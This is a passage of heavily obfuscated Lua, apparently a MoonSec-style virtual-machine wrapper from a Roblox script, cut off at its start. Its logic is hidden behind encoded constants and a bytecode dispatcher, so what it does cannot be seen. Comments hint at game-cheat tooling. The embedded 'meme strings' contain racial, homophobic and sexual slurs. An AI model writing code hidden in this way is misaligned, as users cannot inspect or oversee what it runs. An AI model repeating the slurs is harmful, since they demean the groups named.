l-= l n[e[w]]=n[e[f]]%e[B];break end while(l)/(((0x8b2c9/(-95+0x13a))+-#'Impulse real 2022'))==2812 do local l=e[t];local d=n[l]local r=n[l+2];if(r>0)then if(d>n[l+1])then o=e[x];else n[l+3]=d;end elseif(d<n[l+1])then o=e[O];else n[l+3]=d;end break end;break;end break;end while(l)/((8210-0x1043))==3683 do l=(6548841)while(-#"when the he went where when he where where when the he when ther wher he then here went"+(0x92b6/211))>=a do l-= l l=(7777770)while(119+-0x1d)<a do l-= l local l=e[i];local r=n[l+2];local d=n[l]+r;n[l]=d;if(r>0)then if(d<=n[l+1])then o=e[k];n[l+3]=d;end elseif(d>=n[l+1])then o=e[u];n[l+3]=d;end break end while(l)/(((2343+-0x17)+-#"send nudes"))==3367 do local e=e[s];do return n[e](M(n,e+1,m))end;break end;break;end while(l)/(((-84+(314279/0x85))+-#"impulse was here omg"))==2899 do l=(8430708)while a>(-#'real roblox omg builderman caught playing real'+(0x9b4/18))do l-= l local l;n[e[w]]=P[e[x]];o=o+d;e=r[o];n[e[c]]=n[e[O]][e[S]];o=o+d;e=r[o];n[e[h]]=n[e[b]];o=o+d;e=r[o];l=e[s]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[t]]();break end while 3179==(l)/((0x150f-(0x53967/125)))do local l=e[i];local d=n[l]local r=n[l+2];if(r>0)then if(d>n[l+1])then o=e[f];else n[l+3]=d;end elseif(d<n[l+1])then o=e[O];else n[l+3]=d;end break end;break;end break;end break;end while 920==(l)/((481440/0x88))do l=(4584741)while a<=(0x125-196)do l-= l l=(210720)while a<=((-18+0x96)+-#'hypeblox likes sucking big black cock')do l-= l l=(2220647)while(248-0x9a)<a do l-= l n[e[h]]=z(v[e[b]],nil,P);break end while 689==(l)/(((6595-0xd09)+-#[[how tf do i remove the meme strings]]))do local u;local a;local k;local l;n[e[w]]=P[e[O]];o=o+d;e=r[o];n[e[i]]=n[e[b]][e[B]];o=o+d;e=r[o];l=e[s];k=n[e[f]];n[l+1]=k;n[l]=k[e[D]];o=o+d;e=r[o];n[e[t]]=n[e[b]];o=o+d;e=r[o];n[e[c]]=n[e[x]];o=o+d;e=r[o];l=e[s]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];l=e[h];k=n[e[f]];n[l+1]=k;n[l]=k[e[g]];o=o+d;e=r[o];l=e[t]n[l]=n[l](n[l+U])o=o+d;e=r[o];a={n,e};a[U][a[_][i]]=a[d][a[_][C]]+a[U][a[_][f]];o=o+d;e=r[o];n[e[t]]=n[e[O]]%e[D];o=o+d;e=r[o];l=e[i]n[l]=n[l](n[l+U])o=o+d;e=r[o];k=e[f];u=n[k]for e=k+1,e[S]do u=u..n[e];end;n[e[s]]=u;o=o+d;e=r[o];a={n,e};a[U][a[_][t]]=a[d][a[_][B]]+a[U][a[_][f]];o=o+d;e=r[o];n[e[w]]=n[e[b]]%e[D];break end;break;end while(l)/((-0x42+2700))==80 do l=(4133675)while(((-#"zykem krul"+(21522/0x33))-253)+-#"Luraph v13 has been released changed absolutely fucking nothing")<a do l-= l if n[e[w]]then o=o+d;else o=e[u];end;break end while(l)/((-#'Deeznutsbutinlualoo'+(305828/0xca)))==2765 do n[e[h]]();break end;break;end break;end while(l)/((-#'Boosted moonsec for meme string'+(0x1655-2875)))==1631 do l=(9785888)while(0xe0-125)>=a do l-= l l=(1318590)while a>(-61+0x9f)do l-= l local l;n[e[h]]=P[e[O]];o=o+d;e=r[o];n[e[s]]=n[e[k]][e[S]];o=o+d;e=r[o];n[e[i]]=n[e[O]];o=o+d;e=r[o];l=e[w]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[s]]();o=o+d;e=r[o];do return end;break end while(l)/((0x10cf-2210))==630 do n[e[h]]=n[e[x]];break end;break;end while(l)/((199712/(0xbba/38)))==3871 do l=(1140087)while a<=((5693-0xb4d)/28)do l-= l local l;n[e[t]]=n[e[u]][e[D]];o=o+d;e=r[o];n[e[t]]=n[e[O]][e[S]];o=o+d;e=r[o];n[e[i]]=e[b];o=o+d;e=r[o];l=e[s]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];if not n[e[c]]then o=o+U;else o=e[O];end;break;end while(l)/((1820-0x39b))==1271 do l=(439635)while(0x8e+-41)<a do l-= l local o=e[t]n[o]=n[o](M(n,o+d,e[u]))break end while 1659==(l)/((283+-0x12))do o=e[O];break end;break;end break;end break;end break;end break;end break;end while(l)/((-#'beliveri12 is gay'+(0x763+-21)))==2008 do l=(14516612)while a<=(-0x30+167)do l-= l l=(1677720)while a<=(-#"da hood money generator 2022 working free no virus"+(0x16b-203))do l-= l l=(130152)while(225+-0x77)>=a do l-= l l=(103320)while(-#'Russian letters'+(17374/0x92))>=a do l-= l l=(144100)while(0x2504/92)<a do l-= l n[e[w]]=(e[O]~=0);break end while(l)/((-#"zykem krul"+(-0x6a+771)))==220 do n[e[t]]={};break end;break;end while 45==(l)/((0xaa68/19))do l=(9617920)while(-#[[impulse was here omg]]+(0x4f97/163))<a do l-= l local a;local l;l=e[h]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[s]][e[O]]=n[e[C]];o=o+d;e=r[o];n[e[c]]=P[e[u]];o=o+d;e=r[o];n[e[h]]=n[e[u]];o=o+d;e=r[o];n[e[h]]=(e[k]~=0);o=o+d;e=r[o];l=e[w]n[l](M(n,l+U,e[k]))o=o+d;e=r[o];n[e[s]]=P[e[k]];o=o+d;e=r[o];n[e[i]]=n[e[f]][e[D]];o=o+d;e=r[o];n[e[c]]=e[x];o=o+d;e=r[o];l=e[w]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[i]]=P[e[u]];o=o+d;e=r[o];n[e[s]]=n[e[k]][e[N]];o=o+d;e=r[o];n[e[h]]=e[u];o=o+d;e=r[o];l=e[s]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[w]]=P[e[b]];o=o+d;e=r[o];n[e[t]]=n[e[u]][e[S]];o=o+d;e=r[o];n[e[w]]=e[O];o=o+d;e=r[o];l=e[h]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[w]]=P[e[b]];o=o+d;e=r[o];n[e[h]]=n[e[O]][e[C]];o=o+d;e=r[o];n[e[i]]=e[u];o=o+d;e=r[o];l=e[h]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[i]]=P[e[k]];o=o+d;e=r[o];n[e[t]]=n[e[x]][e[C]];o=o+d;e=r[o];n[e[h]]=e[O];o=o+d;e=r[o];l=e[i]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[t]]=P[e[b]];o=o+d;e=r[o];n[e[i]]=n[e[x]][e[N]];o=o+d;e=r[o];n[e[c]]=e[k];o=o+d;e=r[o];l=e[s]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[i]]=P[e[x]];o=o+d;e=r[o];n[e[t]]=n[e[f]][e[g]];o=o+d;e=r[o];n[e[w]]=e[k];o=o+d;e=r[o];l=e[w]n[l]=n[l](n[l+U])o=o+d;e=r[o];n[e[t]][e[k]]=e[S];o=o+d;e=r[o];n[e[i]]=P[e[f]];o=o+d;e=r[o];n[e[w]]=n[e[O]][e[C]];o=o+d;e=r[o];n[e[i]]=n[e[k]][e[C]];o=o+d;e=r[o];l=e[i];a=n[e[x]];n[l+1]=a;n[l]=a[e[g]];o=o+d;e=r[o];n[e[h]]=e[f];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[w]][e[u]]=n[e[g]];o=o+d;e=r[o];n[e[w]]=P[e[x]];o=o+d;e=r[o];n[e[t]]=n[e[b]][e[B]];o=o+d;e=r[o];n[e[h]]=n[e[x]][e[B]];o=o+d;e=r[o];n[e[t]][e[x]]=n[e[C]];o=o+d;e=r[o];n[e[h]][e[k]]=e[N];o=o+d;e=r[o];n[e[h]][e[k]]=n[e[N]];o=o+d;e=r[o];n[e[c]]=P[e[b]];o=o+d;e=r[o];n[e[w]]=n[e[O]][e[B]];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];n[e[t]]=e[f];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[h]][e[f]]=n[e[g]];o=o+d;e=r[o];n[e[c]]=P[e[b]];o=o+d;e=r[o];n[e[s]]=n[e[k]][e[N]];o=o+d;e=r[o];n[e[w]]=e[b];o=o+d;e=r[o];n[e[c]]=e[u];o=o+d;e=r[o];n[e[h]]=e[u];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[h]][e[u]]=n[e[D]];o=o+d;e=r[o];n[e[s]]=P[e[u]];o=o+d;e=r[o];n[e[h]]=n[e[u]][e[D]];o=o+d;e=r[o];n[e[i]]=e[k];o=o+d;e=r[o];n[e[i]]=e[x];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[i]]=e[f];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[k]))o=o+d;e=r[o];n[e[s]][e[O]]=n[e[D]];o=o+d;e=r[o];n[e[w]]=P[e[x]];o=o+d;e=r[o];n[e[c]]=n[e[f]][e[D]];o=o+d;e=r[o];n[e[h]]=e[x];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[i]]=e[f];o=o+d;e=r[o];n[e[s]]=e[k];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[O]))o=o+d;e=r[o];n[e[i]][e[x]]=n[e[N]];o=o+d;e=r[o];n[e[h]][e[f]]=e[B];o=o+d;e=r[o];n[e[h]][e[k]]=n[e[D]];break end while 2560==(l)/((0x1d8b-3806))do o=e[b];break end;break;end break;end while 1276==(l)/((0x24a8/92))do l=(1395416)while a<=(0x4824/171)do l-= l l=(187960)while a>(((-#[[how to join the kkk]]+(0xa26c/165))+-0x70)+-#'nigga porn 360')do l-= l if not n[e[s]]then o=o+U;else o=e[x];end;break end while(l)/((-94+(-#'psx dupe is abd'+(0x606c/68))))==740 do for e=e[i],e[k]do n[e]=nil;end;break end;break;end while 3454==(l)/((859-0x1c7))do l=(3586776)while(-#[[when the he went where when he where where when the he when ther wher he then here went]]+(0x1634/29))<a do l-= l local l;n[e[i]]=P[e[u]];o=o+d;e=r[o];n[e[i]]=n[e[k]][e[C]];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[c]]=y[e[u]];o=o+d;e=r[o];l=e[s]n[l]=n[l](M(n,l+d,e[k]))o=o+d;e=r[o];n[e[s]]=n[e[f]][e[D]];o=o+d;e=r[o];n[e[i]][e[b]]=e[B];o=o+d;e=r[o];n[e[s]]=n[e[x]][e[N]];o=o+d;e=r[o];n[e[t]][e[f]]=e[B];o=o+d;e=r[o];do return end;break end while(l)/((0x65c+-36))==2253 do do return end;break end;break;end break;end break;end while 1804==(l)/((0x771-975))do l=(3108446)while(-#[[deadphonelua]]+(31878/0xfd))>=a do l-= l l=(664094)while a<=(271-0x9f)do l-= l l=(6748231)while(-111+0xde)<a do l-= l local e=e[t];do return n[e](M(n,e+1,m))end;break end while 2009==(l)/(((-24+0xd75)+-#[[you can pull my IP but you cant pull any bitches fucking loner]]))do local e={n,e};e[U][e[_][h]]=e[d][e[_][S]]+e[U][e[_][k]];break end;break;end while(l)/((0x207-296))==2978 do l=(11575200)while(13899/(8610/0x46))<a do l-= l local l=e[c];local r=n[l+2];local d=n[l]+r;n[l]=d;if(r>0)then if(d<=n[l+1])then o=e[b];n[l+3]=d;end elseif(d>=n[l+1])then o=e[u];n[l+3]=d;end break end while(l)/((0x5d5bb/111))==3360 do n[e[s]]=P[e[x]];break end;break;end break;end while(l)/(((-0x12+2544)+-#'mf stfu'))==1234 do l=(178984)while(0x9a+-38)>=a do l-= l l=(503322)while a>(0x14e-219)do l-= l local e=e[i]local l,o=p(n[e](n[e+U]))m=o+e-d local o=0;for e=e,m do o=o+d;n[e]=l[o];end;break end while 447==(l)/((1230+-0x68))do if(n[e[s]]==n[e[D]])then o=o+U;else o=e[f];end;break end;break;end while(l)/((-#"Ok guys relax Theyre just fucking socks Its impossible for socks to turn me gay My heterosexuality will be fine dudes"+(-80+0xe37)))==52 do l=(2370814)while((0x71e6/239)+-#'Bwomp')>=a do l-= l n[e[w]]=e[u];break;end while(l)/((0x1f4e-4016))==593 do l=(41175)while(-122+0xf0)<a do l-= l n[e[c]]=n[e[k]]-n[e[S]];break end while(l)/((0x57-62))==1647 do local e=e[s];local o=n[e];for e=e+1,m do F(o,n[e])end;break end;break;end break;end break;end break;end break;end while(l)/(((18635/(-0x32+55))+-#'impulse was here omg'))==3916 do l=(35332)while(-0x3b+187)>=a do l-= l l=(15928)while(-#"anime is for fags"+(229+-0x59))>=a do l-= l l=(2053260)while a<=(0x13da/42)do l-= l l=(6370322)while a>(3240/0x1b)do l-= l local e=e[c]n[e]=n[e]()break end while(l)/((-#"nico der hurensohn"+(-0x3a+3282)))==1987 do n[e[w]][n[e[b]]]=n[e[B]];break end;break;end while(l)/(((0x338ed-105611)/207))==4026 do l=(1323234)while a>(191+-0x45)do l-= l local i=v[e[x]];local a;local l={};a=H({},{__index=function(o,e)local e=l[e];return e[1][e[2]];end,__newindex=function(n,e,o)local e=l[e]e[1][e[2]]=o;end;});for d=1,e[D]do o=o+U;local e=r[o];if e[(27-0x1a)]==98 then l[d-1]={n,e[x]};else l[d-1]={y,e[b]};end;I[#I+1]=l;end;n[e[h]]=z(i,a,P);break end while(l)/((59658/0x3d))==1353 do do return n[e[t]]end break end;break;end break;end while(l)/((303+-0x7a))==88 do l=(11321904)while a<=((388-0xfe)+-#'0nly segc')do l-= l l=(4472930)while a>(281-0x9d)do l-= l n[e[s]]=y[e[u]];o=o+d;e=r[o];n[e[i]]=#n[e[f]];o=o+d;e=r[o];y[e[u]]=n[e[h]];o=o+d;e=r[o];n[e[i]]=y[e[u]];o=o+d;e=r[o];n[e[i]]=#n[e[O]];o=o+d;e=r[o];y[e[b]]=n[e[t]];o=o+d;e=r[o];do return end;break end while(l)/((259259/0x5b))==1570 do y[e[O]]=n[e[w]];break end;break;end while 3608==(l)/(((0x1699c7-740591)/236))do l=(1310640)while a<=(-#'legend says i was here'+(0x14e-186))do l-= l local o=e[h]local r={n[o](M(n,o+1,e[k]))};local l=0;for e=o,e[N]do l=l+d;n[e]=r[l];end break;end while 508==(l)/((0x903e4/(-0x60+325)))do l=(12073649)while((-87+(581-0x157))+-#"keno 0347 is a nerdy fag")<a do l-= l n[e[s]]=y[e[k]];break end while(l)/((-#[[impulse is hot]]+(-0x40+3949)))==3119 do if(n[e[h]]~=n[e[B]])then o=o+U;else o=e[b];end;break end;break;end break;end break;end break;end while 1606==(l)/((0x6e0/80))do l=(9427782)while(0x166-(0x153+-113))>=a do l-= l l=(3768195)while(260/0x2)>=a do l-= l l=(8737536)while a>(-#'mf stfu'+(0x7898/227))do l-= l local a;local t,b;local h;local l;n[e[c]]=P[e[u]];o=o+d;e=r[o];n[e[c]]=P[e[x]];o=o+d;e=r[o];l=e[i];h=n[e[x]];n[l+1]=h;n[l]=h[e[N]];o=o+d;e=r[o];n[e[w]]=e[x];o=o+d;e=r[o];l=e[i]t,b=p(n[l](M(n,l+1,e[x])))m=b+l-1 a=0;for e=l,m do a=a+d;n[e]=t[a];end;o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,m))o=o+d;e=r[o];n[e[s]]();o=o+d;e=r[o];do return end;break end while(l)/((5995-0xbf3))==2976 do local l=e[h];local o=n[e[x]];n[l+1]=o;n[l]=o[e[C]];break end;break;end while(l)/(((0x7922a/149)+-#[[papier ist ein kleiner schwanz lutscher]]))==1145 do l=(555450)while((27800/(31200/0x9c))+-#"lego hax")<a do l-= l local l;n[e[i]]=n[e[k]][e[S]];o=o+d;e=r[o];n[e[w]]=e[k];o=o+d;e=r[o];n[e[t]]=e[f];o=o+d;e=r[o];n[e[w]]=e[b];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[w]][e[x]]=n[e[S]];o=o+d;e=r[o];n[e[h]]=P[e[O]];o=o+d;e=r[o];n[e[i]]=n[e[u]][e[N]];o=o+d;e=r[o];n[e[h]]=e[b];o=o+d;e=r[o];n[e[w]]=e[f];o=o+d;e=r[o];n[e[c]]=e[b];o=o+d;e=r[o];n[e[s]]=e[u];o=o+d;e=r[o];l=e[i]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[i]][e[k]]=n[e[C]];o=o+d;e=r[o];n[e[i]]=P[e[x]];o=o+d;e=r[o];n[e[i]]=n[e[O]][e[C]];o=o+d;e=r[o];n[e[c]]=e[O];o=o+d;e=r[o];n[e[c]]=e[b];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[c]]=e[x];o=o+d;e=r[o];l=e[w]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[t]][e[f]]=n[e[D]];o=o+d;e=r[o];n[e[c]]=P[e[O]];o=o+d;e=r[o];n[e[c]]=n[e[b]][e[S]];o=o+d;e=r[o];n[e[s]]=n[e[x]][e[g]];o=o+d;e=r[o];n[e[h]][e[b]]=n[e[g]];o=o+d;e=r[o];n[e[w]][e[x]]=e[C];o=o+d;e=r[o];n[e[w]]=P[e[k]];o=o+d;e=r[o];n[e[h]]=n[e[f]][e[N]];o=o+d;e=r[o];n[e[t]]=e[x];o=o+d;e=r[o];n[e[c]]=e[k];o=o+d;e=r[o];n[e[s]]=e[k];o=o+d;e=r[o];l=e[t]n[l]=n[l](M(n,l+d,e[k]))o=o+d;e=r[o];n[e[s]][e[k]]=n[e[C]];o=o+d;e=r[o];n[e[s]][e[x]]=e[g];o=o+d;e=r[o];n[e[h]][e[O]]=e[S];o=o+d;e=r[o];n[e[c]][e[u]]=n[e[N]];o=o+d;e=r[o];n[e[h]]=P[e[O]];o=o+d;e=r[o];n[e[i]]=n[e[O]][e[C]];o=o+d;e=r[o];n[e[w]]=e[f];o=o+d;e=r[o];n[e[w]]=e[u];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];l=e[h]n[l]=n[l](M(n,l+d,e[k]))o=o+d;e=r[o];n[e[i]][e[b]]=n[e[C]];o=o+d;e=r[o];n[e[c]]=P[e[f]];o=o+d;e=r[o];n[e[w]]=n[e[f]][e[g]];o=o+d;e=r[o];n[e[w]]=e[b];o=o+d;e=r[o];n[e[s]]=e[u];o=o+d;e=r[o];n[e[h]]=e[k];o=o+d;e=r[o];n[e[s]]=e[O];o=o+d;e=r[o];l=e[i]n[l]=n[l](M(n,l+d,e[b]))o=o+d;e=r[o];n[e[t]][e[b]]=n[e[N]];o=o+d;e=r[o];n[e[w]]=P[e[u]];o=o+d;e=r[o];n[e[w]]=n[e[u]][e[D]];o=o+d;e=r[o];n[e[h]]=e[O];o=o+d;e=r[o];n[e[s]]=e[k];o=o+d;e=r[o];n[e[w]]=e[u];o=o+d;e=r[o];n[e[h]]=e[x];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[x]))o=o+d;e=r[o];n[e[w]][e[x]]=n[e[g]];o=o+d;e=r[o];n[e[t]]=P[e[u]];o=o+d;e=r[o];n[e[w]]=n[e[O]][e[S]];o=o+d;e=r[o];n[e[w]]=n[e[b]][e[S]];o=o+d;e=r[o];n[e[w]][e[f]]=n[e[g]];o=o+d;e=r[o];n[e[c]][e[k]]=e[D];o=o+d;e=r[o];n[e[s]]=P[e[k]];o=o+d;e=r[o];n[e[h]]=n[e[O]][e[B]];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];n[e[c]]=e[f];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];l=e[c]n[l]=n[l](M(n,l+d,e[O]))o=o+d;e=r[o];n[e[h]][e[x]]=n[e[B]];o=o+d;e=r[o];n[e[i]][e[b]]=e[N];o=o+d;e=r[o];n[e[h]][e[O]]=e[g];o=o+d;e=r[o];n[e[h]][e[k]]=n[e[C]];o=o+d;e=r[o];n[e[t]]=P[e[x]];o=o+d;e=r[o];n[e[h]]=n[e[k]][e[S]];o=o+d;e=r[o];n[e[h]]=e[u];o=o+d;e=r[o];n[e[t]]=e[k];o=o+d;e=r[o];n[e[t]]=e[x];break end while(l)/((14350/0x29))==1587 do local l;local a;local h,x;local l;n[e[w]]=P[e[u]];o=o+d;e=r[o];n[e[c]]=n[e[k]][e[g]];o=o+d;e=r[o];for e=e[s],e[f]do n[e]=nil;end;o=o+d;e=r[o];n[e[i]]=P[e[f]];o=o+d;e=r[o];n[e[i]]=y[e[u]];o=o+d;e=r[o];n[e[t]]=n[e[b]][e[S]];o=o+d;e=r[o];n[e[s]]=y[e[b]];o=o+d;e=r[o];l=e[i]h,x=p(n[l](n[l+U]))m=x+l-d a=0;for e=l,m do a=a+d;n[e]=h[a];end;o=o+d;e=r[o];l=e[t]h={n[l](M(n,l+1,m))};a=0;for e=l,e[g]do a=a+d;n[e]=h[a];end o=o+d;e=r[o];o=e[k];break end;break;end break;end while(l)/((0x1eb0-3957))==2418 do l=(11287199)while a<=(((0xd3db2/97)/42)+-#'how to use visual studio jk jk dont take it seriously what 6 hours per messange')do l-= l l=(74760)while(-#[[anime is for fags]]+(-51+0xc9))<a do l-= l local e=e[s];do return M(n,e,m)end;break end while 42==(l)/((-#[[Nsrds GAYYYYAIAHAKAJAVAHAUA]]+(3728-0x781)))do P[e[b]]=n[e[t]];break end;break;end while(l)/((0xd74+(49+-0x54)))==3311 do l=(5173944)while(325-0xbe)>=a do l-= l local l=e[f];local o=n[l]for e=l+1,e[g]do o=o..n[e];end;n[e[t]]=o;break;end while 2316==(l)/((0x11b6-2300))do l=(2841090)while(0xa4+-28)<a do l-= l local e=e[t]n[e](n[e+U])break end while 978==(l)/((-#"mama mo"+(5859-0xb83)))do local o=e[t]local l,e=p(n[o](M(n,o+1,e[u])))m=e+o-1 local e=0;for o=o,m do e=e+d;n[o]=l[e];end;break end;break;end break;end break;end break;end break;end break;end break;end o+= U end;end);end;return z(Y(),{},G())()end)_msec({[(-#[[sex in fortnite real]]+(215+-0x27))]='\115\116'..(function(e)return(e and'ددقحآنسضس؃نجق؃آ')or'\114\105'or'\120\58'end)((-#'zykem krul'+(122-(321-0xd6)))==(576/0x60))..'\110g',["ڪنټزكڪضنكڝټقؠحنڝ؃ج"]='\108\100'..(function(e)return(e and'ټئنقآكڪنڪحڪ؃سټضؠج')or'\101\120'or'\119\111'end)((-81+0x56)==(642/0x6b))..'\112',["جك؃قټض؃ن؃ضڝنټ؃ح؃ڝ"]=(function(e)return(e and'ټقئدكزؠحنڪكككنضكحدؠ')and'\98\121'or'\100\120'end)(((0xc6+-106)+-#"MSC 793z487nhvcgsdfgsudfza9889jgvz56gz56z547684z5g54z948g56z74j56475jzg645z6456 oh wait")==(-75+0x50))..'\116\101',["زحزضئؠقټنؠدنآټدق"]='\99'..(function(e)return(e and'آضئڪڝ؃نض؃ئسنحسؠئ')and'\90\19\157'or'\104\97'end)((-#"MSC 793z487nhvcgsdfgsudfza9889jgvz56gz56z547684z5g54z948g56z74j56475jzg645z6456 oh wait"+(-103+0xc3))==(525/0xaf))..'\114',[(0x1abaa/213)]='\116\97'..(function(e)return(e and'ضقسزحكضئڝ؃')and'\64\113'or'\98\108'end)((1326/0xdd)==(130/((329-0xe3)+-#"function howtofucknicuse print you cant fuck nicuse sorry haha you noooo end")))..'\101',["زؠحقدآؠڝجؠڝنئ"]=(function(e)return(e and'ڪزټئكضجڝنسجكن')or'\115\117'or'\78\107'end)((-#"Boosted moonsec for meme string"+(0x89+-103))==(-#[[i have found your porn folder i am now approaching your house at 83 miles per hour]]+(-69+0xb6)))..'\98',["زټدسض؃زڪنززحقؠڪقآ"]='\99\111'..(function(e)return(e and'زئز؃ټسجزؠزدحآ')and'\110\99'or'\110\105\103\97'end)((0xae-143)==((200-(-#'why 6 hours cooldown to send a meme strings'+(430-0x10a)))+-#"never gonna give you up never gonna let you down"))..'\97\116',[(0x4ca/2)]=(function(e,o)return(e and'جئئحقڝڝسكټضنڝ')and'\48\159\158\188\10'or'\109\97'end)((90-0x55)==(30/0x5))..'\116\104',[((0xb3e-1482)+-#'elbicho')]=(function(e,o)return((220/0x2c)==((1092/0x34)+-#[[Impulse youtube ez]])and'\48'..'\195'or e..((not'\20\95\69'and'\90'..'\180'or o)))or'\199\203\95'end),["؃جججڝؠټټآئ؃سند؃جقق"]='\105\110'..(function(e,o)return(e and'كزڝئنزجئزجدؠسآڪئضض')and'\90\115\138\115\15'or'\115\101'end)((91+-0x56)==(-#'moonsec got deobfuscated'+(-0x6e+165)))..'\114\116',["آجقضټ؃نئڪحزسدكح"]='\117\110'..(function(e,o)return(e and'حكؠنكآقؠڝؠح؃')or'\112\97'or'\20\38\154'end)(((0x37bc/164)+-#'i have found your porn folder i am now approaching your house at 83 miles per hour')==(6324/0xcc))..'\99\107',["سكآټ؃قدئققآسق"]='\115\101'..(function(e)return(e and'سنزڪقڪؠؠننؠسئحنئق')and'\110\112\99\104'or'\108\101'end)((128-0x7b)==(868/0x1c))..'\99\116',["؃سزڝ؃جحضجنضحقنټ"]='\116\111\110'..(function(e,o)return(e and'ڪڪقنؠددزآن')and'\117\109\98'or'\100\97\120\122'end)((250/0x32)==(275/0x37))..'\101\114'},{["ؠؠ؃زكضقحڝ"]=((getfenv))},((getfenv))()) end)()


